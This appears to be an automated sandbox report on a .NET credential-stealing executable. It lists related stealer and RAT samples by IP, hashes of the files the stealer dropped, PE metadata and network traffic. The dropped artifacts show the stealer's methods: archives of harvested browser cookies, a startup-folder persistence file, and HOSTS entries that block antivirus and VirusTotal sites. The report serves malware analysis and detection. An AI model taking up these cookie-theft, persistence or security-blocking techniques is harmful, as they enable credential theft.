file.exe | malicious | Blank Grabber | 162.159.136.232
xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | 162.159.128.233
IErMYVWrv9.exe | malicious | Python Stealer, Luna Grabber, Luna Logger | 162.159.135.232
Cooperative Agreement0000800380.docx.exe | malicious | Babadeda, Blank Grabber | 162.159.138.232
VzhY4BcvBH.exe | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | 162.159.136.232
5QnwxSJVyX.doc | malicious | Unknown | 162.159.136.232

Match: ip-api.com
Associated Sample Name / URL | Detection | Threat Name | Context
http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe | malicious | Poisonivy | 208.95.112.1
ORDER-6070Y689_0PF57682456_DECVC789378909740.js | malicious | WSHRat, Snake Keylogger | 208.95.112.1
New Order Enquiry.js | malicious | AgentTesla | 208.95.112.1
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | 208.95.112.1
KrnlSetup.exe | malicious | XWorm | 208.95.112.1
Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | 208.95.112.1
mu3JuAyrj5.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
interior-design-villa-a23.lnk | malicious | MalLnk | 208.95.112.1
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 208.95.112.1
run.cmd | malicious | Unknown | 208.95.112.1
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exe | malicious | Havoc | 172.67.0.58
Itaxyhi.exe | malicious | Phemedrone Stealer | 172.67.70.233
SEejSLAS9f.exe | malicious | Stealc | 172.67.179.207
CJE003889.exe | malicious | FormBook | 172.67.158.81
https://hongkongliving.com | malicious | CAPTCHA Scam ClickFix | 104.18.33.8
Hays eft_Receipt number N302143235953.htm | malicious | Unknown | 104.17.25.14
http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe | malicious | Poisonivy | 172.67.26.92
Mozi.m.elf | malicious | Mirai | 172.71.119.218
EbXj93v3bO.exe | malicious | Stealc | 172.67.179.207
EFT Remittance_(Deerequipment)CQDM.html | malicious | Unknown | 104.21.18.132

Match: TUT-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
ORDER-6070Y689_0PF57682456_DECVC789378909740.js | malicious | WSHRat, Snake Keylogger | 208.95.112.1
New Order Enquiry.js | malicious | AgentTesla | 208.95.112.1
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | 208.95.112.1
KrnlSetup.exe | malicious | XWorm | 208.95.112.1
Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | 208.95.112.1
mu3JuAyrj5.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
interior-design-villa-a23.lnk | malicious | MalLnk | 208.95.112.1
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 208.95.112.1
run.cmd | malicious | Unknown | 208.95.112.1
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Itaxyhi.exe | malicious | Phemedrone Stealer | 162.159.138.232
 | Aclatis tool.exe | malicious | Unknown | 162.159.138.232
 | Aclatis tool.exe | malicious | Unknown | 162.159.138.232
 | Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 162.159.138.232
 | 751ietQPnX.lnk | malicious | RHADAMANTHYS | 162.159.138.232
 | l92fYljXWF.lnk | malicious | RHADAMANTHYS | 162.159.138.232
 | qxjDerXRGR.lnk | malicious | RHADAMANTHYS | 162.159.138.232
 | taCCGTk8n1.lnk | malicious | RHADAMANTHYS | 162.159.138.232
 | Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown | 162.159.138.232
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):190464
                                                                                                                            Entropy (8bit):5.995125051419421
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
                                                                                                                            MD5:E09F55D421CB45340A8C97C217BA56CF
                                                                                                                            SHA1:2280AFE7BB2D07C315E2599C21F069DD1B7CE3B8
                                                                                                                            SHA-256:1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
                                                                                                                            SHA-512:0D690F46D18855009AF0B15A8E352DBE178DE4D0F055FAB00CC18837AD30AEE3FFFFEF5263BB6598FF0E6BA7DBB55029CE976101BE853CB03B01B9B440418C8B
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`.....................................O.......P.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B................@.......H...........@T......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1965
                                                                                                                            Entropy (8bit):5.377802142292312
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                            MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                            SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                            SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                            SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e...........................................................
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):40960
                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):692885
                                                                                                                            Entropy (8bit):7.997438656394754
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:z6li8TUJM0pWV42FPi03ML0Ayftkl5p4aIrzSm+OVgyKUHnH2td/4fOQ+9:B8TaM5ZKLL0AyfA5itrzQLUEyfOX
                                                                                                                            MD5:80F4ED673EAFA69AFE70C10A66A237E6
                                                                                                                            SHA1:6EB1E30DA69F5089BD6F159A3AD6F8E3C1A04780
                                                                                                                            SHA-256:91A766C784F90B3D9B5FCA5BF86A8DCC3944EDC643D2D861CB1E2089BC7BD482
                                                                                                                            SHA-512:DB4C9B6F1CA6926869D5B1F6DF4A90FFA95F80E9565A91556D9725CE082C0D21EC741F8E2DAA19922F791A6D76AFB0A7816CEB675DF137BA9B3860E345BEBCCC
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK...........Y..Q.....!...#...Browsers/Cookies/Chrome Cookies.txt}..rC@....f&.Bw.].z .?.1...D.Q!S.}.......ij.\O#H....8.Al....j..PQ..b.........!W.]d..>w.?.lx.....].>N.9..:=]X]},.r..=...,.........]d=.c.%..&u:.k..Uy==...x...1.>R.[.X._....{....ez.^..q2.BRX.......bf.v#...*!..P..Q....M..........v..PK...........Y..............Display/Display.pngl.y8...6~..2d...3.P.J.1#...Q.K..$.....)....E.......}.}....|....8..9^s..~..u..y...OWG...<...,.M.{.@O.....hCe..m.9....t.-...R.G...C...N6...4v....'?P.m.c.8..QW.w6[>..>.w..Xs.v.....OC..t~.A.Jg.p....?.....4.7;...n%.....-p.K..68.<<...'..[.......v.n/f.y,.=.Z].s..O...kP....fj..S.....Kq.u..R.|........=$.s...]y.4..V..7..;<.8..E..m;.W<...n......85HB)........|4V.#..].O..K^?..*WMo7..pG.q]NO..}.:.UK....n....{......Zkl.#.,...u..Y..v.Ry<.D..v.:,#..e~.P...;T..=....e.>...Q..I...G.[...I..(U.RI...;..M..Y2..<...F....r_..n.....+..{LM.:L.i.!5.........[.QT._.=...."{.|.D.x..,#...a6.{.{.]^...C"v...I..o3..ups.3.v........~.X"..v.k...}&..".
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):289
                                                                                                                            Entropy (8bit):5.850578214989895
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Pk3r4QVLP36lSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISh+3rsB7iUuxbW:c74QVLP3ClDuyXv3RdJqmOvO65+7273N
                                                                                                                            MD5:12374B4FCB7DCDDB399BBC691B28FEDC
                                                                                                                            SHA1:2CCDFE6CAC3A0DF5A73E0009BF7C256030C9B77B
                                                                                                                            SHA-256:E952C4E4D88F7E4F25CC1CD22DFB854184B11C727EB19733E48819C7FB8D8990
                                                                                                                            SHA-512:4D0DA18548AD301EA9A165E78526269A1000E0CA856A08669A1520FCD5503AD7C608C477C892F550F28076263044055F30E52EB588855D38C934C16B617FF2AA
                                                                                                                            Malicious:false
                                                                                                                            Preview:.google.com.TRUE./.FALSE.13356771602392648.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.13343552440345167.1P_JAR.2023-10-05-06..
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):709841
                                                                                                                            Entropy (8bit):7.926892930022921
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:kly9yLuLgP21SfDwiaPrxJ8zCJ8C6sdjGoKPntsj/cNH39nRclFl+q2i5G:klSsNw5PNJ8OJ8CPjG9yYN9RUl+R
                                                                                                                            MD5:C3262D897432D7D8B77117F3E043A194
                                                                                                                            SHA1:5DE269DDDB39C47697E11743DC8231D745476519
                                                                                                                            SHA-256:D81545C26BCE8BC9DA9EF2E530DDC678B3F165AF300401DC11E302B4635455F2
                                                                                                                            SHA-512:AAFA50DB9212B23EE961213012D77450FFEE9BF65EA8119E64F19B9E3285594EAB297A8091425ECF0A8FDF67218C04329411E168E3D37C76A2224F4EA5ED9F4E
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u...}.z.w..M..{/....?N.....}y..;Nlc....=....q......}/z..v.`....$....}...!.#....~..]g..}..1.QU.f.Zgk..|..V.v.k...i..&.9..U~.k......j..{.e.....9....~...7"}..x_.d$....5@..U.v.+.......-..G...T..)+6.'..A..^..}'..-....mA..C.~....WP?vY..^S;fiG..=t.?XR.7L.G.4,.......zJ...wE_F.;.........s..[.....gZ.....w@..q.!....+...T..................g.}../...~../.aP......k.....m.g.iI.g|.>.p....O=...1.~$..h.X>..!.V}.......~`.O._..........B.....O>......../.w....}..(.L..'..G..{C......q\?..c\k..|..1..xd.q.....~w'4....*6.....q.......J....=..3.N.q......s...........7..P.{A..5?..../.[.i,....=aB.....b..8.b...i.q......X_..m.q...0v.o...=........b.f.......}.K;n..~..nw...w....x?{...}n..v{.c..w.Vlk.....5/1f.x.]KK....g.......Z....[.....'..s........}.nM..|[....lB..s.y...iq.......v.5.....7B.>.j............5;..q}l5..c....?%^7..)O.g....s..c...m{C.o.s.M.)...q-.t=.16...
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20480
                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                            Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\apDMcnqqWs.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):51200
Entropy (8bit):0.8745947603342119
Encrypted:false
SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:378391FDB591852E472D99DC4BF837DA
SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\apDMcnqqWs.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.8508558324143882
Encrypted:false
SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:933D6D14518371B212F36C3835794D75
SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\apDMcnqqWs.exe
File Type:ASCII text, with CRLF, LF line terminators
Category:dropped
Size (bytes):2285
Entropy (8bit):4.576057831611122
Encrypted:false
SSDEEP:48:vDZhyoZWM9rU5fFc7w09PI8A+VyUq8UwWsnNhUm:vDZEurK9z8TwU0wWsn/
MD5:A58B2342D8EAA7EA695FD216006E3DDD
SHA1:A286457D10D2A50E7B2699BDF55D85081FADD23C
SHA-256:C3AF2F576A3758B1BCDBD491B6021FBF52F6AFF4C0D03F4914D9C3F51A6A6361
SHA-512:B1938B288BECE554759F4FA8341513828487960991AE6C4A8C4D3958A5669357A6C2F1ED140FF87E740DC4C6AFEB9F16967AE7F4000F41341B802D22D8CE8FC3
Malicious:true
Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 virusscan.jotti.org..0.0.0.0 www.virusscan.jotti.org..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.995125051419421
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name:apDMcnqqWs.exe
File size:190'464 bytes
MD5:e09f55d421cb45340a8c97c217ba56cf
SHA1:2280afe7bb2d07c315e2599c21f069dd1b7ce3b8
SHA256:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
SHA512:0d690f46d18855009af0b15a8e352dbe178de4d0f055fab00cc18837ad30aee3ffffef5263bb6598ff0e6ba7dbb55029ce976101be853cb03b01b9b440418c8b
SSDEEP:3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
TLSH:4014294853BC8F23F7AF4FFC866191D6CB72B107E84AF74E1C8890E825667816445BA7
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`................................
Icon Hash:00928e8e8686b000
Entrypoint:0x42fd5e
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2fd0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x30000 | 0x550 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2fcf0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2dd64 | 0x2de00 | dfa34e24ec0ae8fa46925a31adefc1e9 | False | 0.38844835660762944 | data | 6.0132344968072955 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x30000 | 0x550 | 0x600 | f35488c1e24e6c68f25bb08be804abb2 | False | 0.4134114583333333 | data | 4.5666280949668066 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x32000 | 0xc | 0x200 | 12806d217d24165bd64fb2dc9424a8d4 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x300a0 | 0x2c4 | data | | | 0.4463276836158192
RT_MANIFEST | 0x30364 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                            Dec 11, 2024 08:40:18.088258028 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088295937 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088304043 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088361979 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088368893 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088457108 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088469028 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088494062 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088501930 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088557005 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088571072 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088577986 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088582039 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088598967 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088608027 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088694096 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088712931 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088752985 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088767052 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088830948 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088845968 CET44349793162.159.138.232192.168.2.6
